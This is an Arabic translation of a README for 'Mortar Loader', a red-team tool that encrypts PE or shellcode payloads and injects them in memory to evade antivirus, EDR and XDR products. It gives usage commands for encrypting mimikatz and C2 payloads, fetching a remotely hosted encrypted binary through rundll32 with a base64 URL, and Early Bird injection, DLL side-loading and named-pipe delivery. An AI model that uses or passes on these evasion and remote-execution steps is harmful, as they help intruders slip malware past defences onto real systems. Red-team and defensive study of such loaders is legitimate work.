
تقنية مراوغة لهزيمة وتحويل اكتشاف ومنع منتجات الأمان (AV/EDR/XDR)
تقنية تهرب للفريق الأحمر بهدف هزيمة وتحويل مسار اكتشاف ومنع منتجات الأمان. يقوم Mortar Loader بتشفير وفك تشفير PE / Shellcode داخل تدفقات الذاكرة وتنفيذه باستخدام عدة تقنيات حقن.
يستطيع Mortar تجاوز منتجات مكافحة الفيروسات الحديثة وحلول XDR المتقدمة، وقد تم اختباره وتأكيد تجاوزه لما يلي:
تم إصدار الإصدار الأحدث (v3) بالميزات التالية:
لمزيد من الوصف الفني، راجع المقالة التالية: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
يقوم المشفر بتشفير شيفرات C ShellCode وثنائيات PE وكتابة المخرجات إلى ملف .enc. يُسمح لك باستخدام أي حمولة (MSF/cobalt/Havoc..إلخ) كما تفضل، طالما أنها من معمارية x64 وليست RAW.
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
يستفيد الإصدار الأحدث من عدة تقنيات مقترنة بجلب الحمولة عن بُعد، يُوصى بالرجوع إلى المقالة التالية للحصول على مزيد من الرؤى.
للحصول على تعليمات سريعة:
# PE Forking
1. استضف الثنائي المشفر على جهاز بعيد.
2. قم بتشفير الرابط النهائي باستخدام base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. تفعيل تقنية الروتين الفرعي لإعادة التحميل الخفي.
يدعم حالياً حقن Early Bird بالاقتران مع الأنابيب المسماة لاستقبال المتغيرات للتنفيذ النهائي.
1. حقن مكتبة Mortar DLL في عملية بعيدة (حقن DLL، اختطاف، تحميل جانبي).
2. الاتصال بالأنبوب المسمى لتزويد الرابط الخاص بك
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. سيتم تنفيذ الحمولة بمجرد استلام قيمة صالحة.
تمت برمجة المشروع باستخدام FPC (Free Pascal)، وإجراءات التجميع واضحة عن طريق تنزيل وتثبيت Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).
يمكنك تنزيل المشفر من قسم الإصدارات أو تجميعه بسهولة باستخدام Lazarus IDE.
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
تطوير Mortar أو أي مشروع مشارك هو نتاج وقتي الشخصي.